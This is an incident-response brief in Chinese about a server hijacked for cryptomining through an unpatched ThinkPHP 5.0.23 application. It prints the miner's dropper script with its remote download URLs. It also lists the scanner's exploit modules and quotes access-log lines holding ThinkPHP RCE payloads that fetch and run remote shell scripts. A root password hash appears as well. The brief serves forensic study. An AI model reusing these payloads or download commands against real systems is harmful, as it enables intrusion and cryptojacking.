某系统被挖矿应急简报

Posted m0rta1s

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了某系统被挖矿应急简报相关的知识,希望对你有一定的参考价值。

某系统被挖矿应急简报

PS:文内所有内容均经被入侵方同意发布

被入侵方提供的信息

nginx +php

thinkphp 3.2

mysql

redis 无密码无限制

应急响应

经项目方提供的信息,发现thinkphp是3.2版本,近期没有RCE(远程代码执行漏洞)。推测是redis问题,分析进程[附录]、历史记录、PHP异常日志、网络连接、计划任务、恶意程序分析.发现恶意程序是通过crontab不断的进行启动执行更新操作。注释掉crontab。

# 挖矿计划任务,用户是Apache
[root@localhost ~]# ls -la /var/spool/cron/
total 12
drwx------. 2 root   root   4096 Apr 28 18:00 .
drwxr-xr-x. 8 root   root   4096 Apr 23 23:54 ..
-rw-------. 1 apache apache   47 Apr 28 18:00 apache
[root@localhost ~]# cat /var/spool/cron/apache
*/30 * * * * sh /tmp/update.sh >/dev/null 2>&1
[root@localhost ~]#

在.bash_history文件中发现建立了一个yaya用户密码为123456,经确认是项目方建立。

# history 项目方建立 弱口令帐号
cat /etc/passwd
useradd yaya
echo 123456 | passwd  --stdin  yaya
history
history  --help
history  -h
top
[root@localhost .ssh]#     cat /etc/passwd|grep -v nologin
root:x:0:0:root:/root:/bin/bash
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
yaya:x:501:501::/home/yaya:/bin/bash
[root@localhost .ssh]# cat /etc/shadow|grep $
root:$6$loNrVZl2$0YaC3m3Uapgqb38T9BlxzbhFoOu6tZvrLTkAJGZ/Y3n.w7fwIlOF0o0xg2mfnTtpS5VYP6QiwbDqvg2CWn2mE.:18009:0:99999:7:::
yaya:$6$.pEm8JS.$j553rgPtK5iZnlbMhjPU8hhrv/SIetuoOcki2fq98FbJIXxLmZUb7nKRbtindI/3TE1LJPcqoBP876bX7oc6R/:18013:0:99999:7:::
# yaya弱口令帐号登录 登录IP为西湖区
[root@localhost log]# grep yaya -rn ./
./secure-20190428:443153:Apr 27 21:04:57 localhost useradd[32588]: new group: name=yaya, GID=501
./secure-20190428:443154:Apr 27 21:04:57 localhost useradd[32588]: new user: name=yaya, UID=501, GID=501, home=/home/yaya, shell=/bin/bash
./secure-20190428:443681:Apr 27 21:07:19 localhost passwd: pam_unix(passwd:chauthtok): password changed for yaya
./secure-20190428:446927:Apr 27 21:22:07 localhost sshd[1635]: Accepted password for yaya from 112.137.22.114 port 49223 ssh2
./secure-20190428:446928:Apr 27 21:22:08 localhost sshd[1635]: pam_unix(sshd:session): session opened for user yaya by (uid=0)
./secure-20190428:450203:Apr 27 21:37:31 localhost sshd[3102]: Accepted password for yaya from 112.137.22.114 port 49816 ssh2
./secure-20190428:450204:Apr 27 21:37:31 localhost sshd[3102]: pam_unix(sshd:session): session opened for user yaya by (uid=0)
./secure-20190428:458549:Apr 27 22:19:52 localhost sshd[3102]: pam_unix(sshd:session): session closed for user yaya
./secure-20190428:476962:Apr 27 23:36:16 localhost sshd[1635]: pam_unix(sshd:session): session closed for user yaya
Binary file ./wtmp matches

php-fpm错误日志apache用户被删除,导致php-fpm进程启动失败。

# apache用户被删除导致PHP服务启动失败
[root@localhost php-fpm]# cat error.log-20190428  |tail -n 23
[27-Apr-2019 21:28:44] NOTICE: [pool www] child 2296 started
[27-Apr-2019 21:28:44] WARNING: [pool www] child 2039 exited on signal 9 (SIGKILL) after 176.088359 seconds from start
[27-Apr-2019 21:28:44] NOTICE: [pool www] child 2297 started
[27-Apr-2019 21:29:38] NOTICE: Terminating ...
[27-Apr-2019 21:29:38] NOTICE: exiting, bye-bye!
[27-Apr-2019 21:31:45] ERROR: [pool www] cannot get uid for user apache
[27-Apr-2019 21:31:45] ERROR: FPM initialization failed
[27-Apr-2019 21:32:59] NOTICE: fpm is running, pid 2701
[27-Apr-2019 21:32:59] NOTICE: ready to handle connections
[27-Apr-2019 21:43:31] NOTICE: Terminating ...
[27-Apr-2019 21:43:31] NOTICE: exiting, bye-bye!
[27-Apr-2019 21:43:35] ALERT: [pool www] user has not been defined
[27-Apr-2019 21:43:35] ERROR: failed to post process the configuration
[27-Apr-2019 21:43:35] ERROR: FPM initialization failed
[27-Apr-2019 21:45:57] ALERT: [pool www] user has not been defined
[27-Apr-2019 21:45:57] ERROR: failed to post process the configuration
[27-Apr-2019 21:45:57] ERROR: FPM initialization failed
[27-Apr-2019 21:48:40] NOTICE: fpm is running, pid 4128
[27-Apr-2019 21:48:40] NOTICE: ready to handle connections
[27-Apr-2019 21:53:15] NOTICE: Terminating ...
[27-Apr-2019 21:53:15] NOTICE: exiting, bye-bye!
[27-Apr-2019 21:54:40] NOTICE: fpm is running, pid 4677
[27-Apr-2019 21:54:40] NOTICE: ready to handle connections
# 端口连接信息
[root@localhost conf]# netstat -natp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
tcp        0      0 127.0.0.1:9000              0.0.0.0:*                   LISTEN      4677/php-fpm        
tcp        0      0 0.0.0.0:9001                0.0.0.0:*                   LISTEN      4644/nginx          
tcp        0      0 0.0.0.0:80                  0.0.0.0:*                   LISTEN      4644/nginx          
tcp        0      0 213.139.123.100:80            111.27.151.57:23852        SYN_RECV    -                   
tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN      3248/sshd           
tcp        0      0 0.0.0.0:9080                0.0.0.0:*                   LISTEN      4644/nginx          
tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      1879/master         
tcp        0      0 127.0.0.1:9000              127.0.0.1:47059             TIME_WAIT   -                   
tcp        0      0 127.0.0.1:9000              127.0.0.1:47058             TIME_WAIT   -                   
tcp        0      0 127.0.0.1:9000              127.0.0.1:47061             TIME_WAIT   -                   
tcp        0      0 213.139.123.100:22            158.242.82.113:39166          ESTABLISHED 12209/sshd          
tcp        0      0 127.0.0.1:9000              127.0.0.1:47057             TIME_WAIT   -                   
tcp        0      0 213.139.123.100:35936         147.198.12.122:3306          TIME_WAIT   -                   
tcp        0      0 127.0.0.1:9000              127.0.0.1:47062             TIME_WAIT   -                   
tcp        0      0 127.0.0.1:9000              127.0.0.1:47056             TIME_WAIT   -                   
tcp        0      0 213.139.123.100:22            158.242.82.113:56172          ESTABLISHED 11127/sshd          
tcp        0      0 :::22                       :::*                        LISTEN      3248/sshd           
tcp        0      0 ::1:25                      :::*                        LISTEN      1879/master  

无实质进展,开始分析漏洞攻击程序

# 显示通过sh脚本下载攻击程序之后进行蠕虫攻击
#!/bin/sh
setenforce 0 2>dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null # 关闭selinux
sync && echo 3 >/proc/sys/vm/drop_caches
crondir=/var/spool/cron/‘"$USER"                          # 生成当前用户的计划文件位置
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`                      # 查看已连接记录
echo 1 > /etc/sysupdates
rtdir="/etc/sysupdates"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/url"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/get"
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/curl /usr/bin/url
miner_url="https://pixeldrain.com/api/file/3myaXqqZ"
miner_url_backup="http://43.245.222.57:8667/6HqJB0SPQqbFbHJD/sysupdate"
miner_size="854364"
sh_url="http://43.245.222.57:8667/6HqJB0SPQqbFbHJD/update.sh"
sh_url_backup="http://43.245.222.57:8667/6HqJB0SPQqbFbHJD/update.sh"
config_url="http://43.245.222.57:8667/6HqJB0SPQqbFbHJD/config.json"
config_url_backup="http://43.245.222.57:8667/6HqJB0SPQqbFbHJD/config.json"
config_size="3300"
scan_url="https://pixeldrain.com/api/file/aQWIprw_"
scan_url_backup="http://43.245.222.57:8667/6HqJB0SPQqbFbHJD/networkservice"
scan_size="2209848"
watchdog_url="https://pixeldrain.com/api/file/knkIaq6F"
watchdog_url_backup="http://43.245.222.57:8667/6HqJB0SPQqbFbHJD/sysguard"
watchdog_size="1645344"
# networkservice扫描程序利用的漏洞
_/tmp/0324/scan/exp.cc_is_shell_rce
_/tmp/0324/scan/exp.cc_shell_rce
_/tmp/0324/scan/exp.cc_shell_t_rce
_/tmp/0324/scan/exp.Cctv_exploit
_/tmp/0324/scan/exp.dp_isdrupal
_/tmp/0324/scan/exp.dp_check_payload
_/tmp/0324/scan/exp.dp_7600_ver8_rce
_/tmp/0324/scan/exp.dp_7600_rce
_/tmp/0324/scan/exp.Drupal_exploit
_/tmp/0324/scan/exp.es_exploit_cve20151427_rce
_/tmp/0324/scan/exp.es_exploit_cve20151427_t_rce
_/tmp/0324/scan/exp.toj
_/tmp/0324/scan/exp.es_exploit_cve20143120_rce
_/tmp/0324/scan/exp.es_exploit_cve20143120_t_rce
_/tmp/0324/scan/exp.Elasticsearch_exploit
_/tmp/0324/scan/exp.get_target
_/tmp/0324/scan/exp.Get_ps_name
_/tmp/0324/scan/exp.Iam_is_scan
_/tmp/0324/scan/exp.Report_succ
_/tmp/0324/scan/exp.get_win_powershell_command_by_cc
_/tmp/0324/scan/exp.Init_cc
_/tmp/0324/scan/exp.hd_exploit_unaurority_rce
_/tmp/0324/scan/exp.Hadoop_exploit
_/tmp/0324/scan/exp.re_exploit_rce
github.com/go-redis/redis.(*StatusCmd).Result
_/tmp/0324/scan/exp.re_exploit_connect_redis
_/tmp/0324/scan/exp.re_exploit_redis_brute   # redis服务暴力破解
_/tmp/0324/scan/exp.re_exploit_unaurority_rce
_/tmp/0324/scan/exp.Redis_exploit            # redils服务漏洞利用
_/tmp/0324/scan/exp.sp_cve20181273_exists
_/tmp/0324/scan/exp.sp_cve20181273_exploit
_/tmp/0324/scan/exp.Spring_exploit
_/tmp/0324/scan/exp.ss_execute_sql
_/tmp/0324/scan/exp.ss_execute_payload
_/tmp/0324/scan/exp.ss_exploit_xcmdshell
_/tmp/0324/scan/exp.ss_exploit_sp_oacreate
_/tmp/0324/scan/exp.ss_crack_login
_/tmp/0324/scan/exp.ss_exploit
_/tmp/0324/scan/exp.Sqlserver_exploit
_/tmp/0324/scan/exp.tp_isThinkphp           # thinkphp 指纹识别
_/tmp/0324/scan/exp.tp5_rce_Exists          # thinkphp 漏洞检测
_/tmp/0324/scan/exp.tp_exploit_tp5rce_exp   # thinkphp 漏洞检测
_/tmp/0324/scan/exp.tp_exploit_tp5rce        # thinkphp 漏洞检测
_/tmp/0324/scan/exp.tp5_23_rce_Exists         # thinkphp5.0.23漏洞检测程序
_/tmp/0324/scan/exp.tp_exploit_tp5_23_rce_exp # thinkphp5.0.23漏洞检测程序
_/tmp/0324/scan/exp.tp_exploit_tp5_23rce        # thinkphp5.0.23漏洞检测程序
_/tmp/0324/scan/exp.Thinkphp_exploit        # thinkphp5.0.23漏洞检测程序
_/tmp/0324/scan/exp.Http_GetData
_/tmp/0324/scan/exp.Encode_powershell
_/tmp/0324/scan/exp.wl_wls_urlistrue
_/tmp/0324/scan/exp.wl_cve201710271_rce
_/tmp/0324/scan/exp.wl_cve201710271_t_rce
_/tmp/0324/scan/exp.Weblogic_exploit
_/tmp/0324/scan/exp.cc_is_shell_rce.func1
_/tmp/0324/scan/exp.cc_shell_rce.func1
_/tmp/0324/scan/exp.dp_isdrupal.func1
_/tmp/0324/scan/exp.dp_check_payload.func1
_/tmp/0324/scan/exp.dp_7600_ver8_rce.func1
_/tmp/0324/scan/exp.es_exploit_cve20151427_rce.func1
_/tmp/0324/scan/exp.es_exploit_cve20143120_rce.func1
_/tmp/0324/scan/exp.hd_exploit_unaurority_rce.func1
_/tmp/0324/scan/exp.hd_exploit_unaurority_rce.func2
_/tmp/0324/scan/exp.sp_cve20181273_exists.func1
_/tmp/0324/scan/exp.sp_cve20181273_exploit.func1
_/tmp/0324/scan/exp.tp_isThinkphp.func1
_/tmp/0324/scan/exp.tp5_rce_Exists.func1
_/tmp/0324/scan/exp.tp_exploit_tp5rce_exp.func1
_/tmp/0324/scan/exp.tp5_23_rce_Exists.func1
_/tmp/0324/scan/exp.tp_exploit_tp5_23_rce_exp.func1
_/tmp/0324/scan/exp.Http_GetData.func1
_/tmp/0324/scan/exp.wl_wls_urlistrue.func1
_/tmp/0324/scan/exp.wl_cve201710271_rce.func1
_/tmp/0324/scan/exp.init
type..hash.[2993]string
type..eq.[2993]string
_/tmp/0324/scan/ipc.download_ipdb
_/tmp/0324/scan/ipc.Init_ip
_/tmp/0324/scan/ipc.init
main.openPort
main.randomIp
main.scan
main.mainScan
main.debug_randomiplist
main.initdebug_ip
main.main
main.setMaxThread
main.init
/tmp/0324/scan/top.go
/tmp/0324/scan/ipc/ipcn.go
/tmp/0324/scan/exp/weblogic_exploit.go
/tmp/0324/scan/exp/utils.go
/tmp/0324/scan/exp/thinkphp_exploit.go
/tmp/0324/scan/exp/sqlserver_exploit.go
/tmp/0324/scan/exp/spring_exploit.go
/tmp/0324/scan/exp/redis_exploit.go
/tmp/0324/scan/exp/hadoop_exploit.go
/tmp/0324/scan/exp/get_target.go
/tmp/0324/scan/exp/elasticsearch_exploit.go
/tmp/0324/scan/exp/drupal_exploit.go
/tmp/0324/scan/exp/cctv_exploit_wait.go

很是平常的漏洞程序。通过分析恶意程序执行逻辑发现计划任务文件是/var/spool/cron/apache,挖矿当前用户是apache并非root,如果是redis漏洞入侵的应该是/var/spool/cron/root文件,通过代码确定应该是web漏洞导致的被入侵。

# 计划任务文件建立路径
#!/bin/sh
setenforce 0 2>dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
crondir=/var/spool/cron/‘"$USER" # 获取当前用户,拼接计划任务文件路径
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/sysupdates
rtdir="/etc/sysupdates"

开始分析web应用程序,共三个目录,发现是两个版本thinkphp3.2.x,一个thinkphp5.0.23,并非项目方提供的全是3.2.x版本框架

 

其中版本5.0.23是存在过代码执行漏洞,查看access.log日志

# 筛选代码执行漏洞攻击数据,发现 194.36.173.4119.96.241.184119.23.150.11147.103.42.52202.176.4.248
# 经过对这些攻击数据的测试发现并没有执行成功
[root@localhost Api]# cd /usr/local/nginx/logs/
[root@localhost logs]# grep invokefunction -rn ./
./access.log:45236:194.36.173.4 - - [26/Apr/2019:11:50:33 +0800] "GET /public/index.php?s=/Index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http://zull.ir/t.sh%20-O%20/tmp/.t;%20chmod%20777%20/tmp/.t;%20sh%20/tmp/.t HTTP/1.1" 404 47 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.6.3.el6.x86_64"
./access.log:45805:194.36.173.4 - - [26/Apr/2019:12:01:53 +0800] "GET /public/index.php?s=/Index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http://zull.ir/t.sh%20-O%20/tmp/.t;%20chmod%20777%20/tmp/.t;%20sh%20/tmp/.t HTTP/1.1" 404 47 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.6.3.el6.x86_64"
./access.log:45810:194.36.173.4 - - [26/Apr/2019:12:04:08 +0800] "GET /public/index.php?s=/Index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl%20http://zull.ir/t.sh HTTP/1.1" 404 47 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.6.3.el6.x86_64"
./access.log:45829:194.36.173.4 - - [26/Apr/2019:12:17:20 +0800] "GET /index.php?s=/index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl%20http://zull.ir/t.sh HTTP/1.1" 200 31 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.6.3.el6.x86_64"
./access.log:45851:194.36.173.4 - - [26/Apr/2019:12:25:54 +0800] "GET /index.php?s=/index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget%20http://194.36.173.4/vi/x86.bushido%20-O%20zullthink%20;%20chmod%20777%20zullthink%20;%20./zullthink%20thinkphp%20;%20rm%20-rf%20zullthink HTTP/1.1" 200 31 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.6.3.el6.x86_64"
./access.log:66105:119.96.241.184 - - [27/Apr/2019:09:58:12 +0800] "GET /index.php?s=index/x5Cthinkx5Capp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
./access.log:68333:119.23.150.111 - - [27/Apr/2019:20:11:58 +0800] "GET /index.php?s=/index/x5Cthinkx5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http://81.6.42.123/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
./access.log:71284:47.103.42.52 - - [28/Apr/2019:05:53:29 +0800] "GET /index.php?s=index/x5Cthinkx5Capp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
./access.log:71386:202.176.4.248 - - [28/Apr/2019:12:00:02 +0800] "GET /index.php?s=index/x5Cthinkx5Capp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"

存在攻击日志,并简单测试发现上面漏洞利用均失败,查看漏洞文件 /proget/Api/thinkphp/library/think/Request.php 发现代码并没有打补丁,构造exp进行攻击测试发现攻击成功

# Request.php 文件时间,查看文件发现并没有打补丁
[root@localhost proget]# stat ./Api/thinkphp/library/think/Request.php
  File: `./Api/thinkphp/library/think/Request.php  Size: 52356           Blocks: 104        IO Block: 4096   regular file
Device: fd03h/64771d    Inode: 22151605    Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-04-28 00:33:01.449702746 +0800
Modify: 2019-04-23 10:55:24.000000000 +0800
Change: 2019-04-25 00:28:47.926143064 +0800

以上是关于某系统被挖矿应急简报的主要内容,如果未能解决你的问题,请参考以下文章

Linux系统-服务器被挖矿

安全运维 - Windows系统应急响应

我的大脑被挖矿代码搞的不能好好思考了

阿里云服务器被挖矿了怎么办?(纯纯电脑小白

解决gitlab被挖矿问题

又被挖矿,求解决方案